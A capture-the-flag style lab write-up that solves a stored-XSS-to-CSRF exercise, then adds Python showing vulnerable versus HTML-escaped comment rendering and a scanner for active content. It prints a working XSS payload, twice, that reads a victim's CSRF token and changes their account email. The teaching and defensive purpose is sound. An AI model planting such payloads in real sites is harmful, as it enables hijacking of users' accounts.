13.31 Lab: Exploiting XSS to perform CSRF
Karthikeyan Nagaraj | 2 min read | Jun 25, 2024
Description
This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to perform a CSRF attack and change the email address of someone who views the blog post comments.
You can log in to your own account using the following credentials: wiener:peter
Solution
- Log in using the credentials provided. On your user account page, notice the function for updating your email address.
- If you view the source for the page, you’ll see the following information:
  * You need to issue a POST request to /my-account/change-email, with a parameter called email.
  * There’s an anti-CSRF token in a hidden input called token.
- This means your exploit will need to load the user account page, extract the CSRF token, and then use the token to change the victim’s email address.
- Submit the following payload in a blog comment:
<script>
// Step 1: fetch the victim's own account page (same origin, so their
// session cookie is sent and the response can be read).
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get', '/my-account', true);
req.send();

function handleResponse() {
    // Step 2: pull the anti-CSRF token out of the hidden input in the HTML.
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    // Step 3: replay it in the email-change request on the victim's behalf.
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf=' + token + '&email=test@test.com');
}
</script>
This will make anyone who views the comment issue a POST request to change their email address to test@test.com.
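The anti-CSRF token does not help here because the injected script runs in the victim's origin and can simply read the token out of the page; the fix is to stop the comment from being rendered as markup in the first place. The following added example (not part of the lab or this write-up) shows the vulnerable rendering pattern next to its HTML-encoded form, plus a small scanner that flags active content in stored comments; the sample comment strings and the render helper names are constructed for the demo.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs: the lab's stored-XSS payload, and a benign comment.
XSS_COMMENT = (
    "<script>var req = new XMLHttpRequest();req.onload = handleResponse;"
    "req.open('get','/my-account',true);req.send();"
    "function handleResponse() {var token = this.responseText.match("
    '/name="csrf" value="(\\w+)"/)[1];var changeReq = new XMLHttpRequest();'
    "changeReq.open('post', '/my-account/change-email', true);"
    "changeReq.send('csrf='+token+'&email=test@test.com')};</script>"
)
BENIGN_COMMENT = "Nice post! See <b>bold</b> & note that 1 < 2."


def render_comment_unsafe(body: str) -> str:
    """Vulnerable pattern: raw comment text is interpolated into the page."""
    return f"<p class='comment'>{body}</p>"


def render_comment_safe(body: str) -> str:
    """Hardened form: HTML-encode user text so it is shown as data, not markup."""
    return f"<p class='comment'>{html.escape(body, quote=True)}</p>"


class ActiveContentScanner(HTMLParser):
    """Reports markup that executes script when rendered: <script> tags,
    on* event-handler attributes and javascript: URLs (a review/detection aid)."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name}")
            elif value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name}")


def scan_comment(markup: str) -> list[str]:
    """Run the scanner over rendered markup and return what it flagged."""
    scanner = ActiveContentScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings
```

Output encoding is the actual fix; a Content Security Policy that disallows inline script is worthwhile defence in depth, but the scanner above is only a review aid and should not be relied on as a filter.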
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng